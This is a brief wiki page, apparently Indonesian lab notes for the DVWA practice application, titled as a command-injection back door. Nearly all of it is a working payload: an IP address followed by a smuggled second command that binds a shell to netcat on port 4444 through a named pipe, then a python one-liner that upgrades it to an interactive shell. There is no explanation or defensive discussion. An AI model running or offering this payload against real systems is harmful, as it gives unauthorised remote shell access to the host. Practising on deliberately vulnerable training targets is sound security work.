DVWA: Command Injection Back Door

From OnnoWiki
Revision as of 13:34, 15 October 2018 by Onnowpurbo (talk | contribs) (Created page with " 192.168.43.1;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe Untuk dapet shell ketik python -c 'import pty; pty.spawn("/bin/sh")'")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Jump to navigation Jump to search


192.168.43.1;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe


Untuk dapet shell ketik

python -c 'import pty; pty.spawn("/bin/sh")'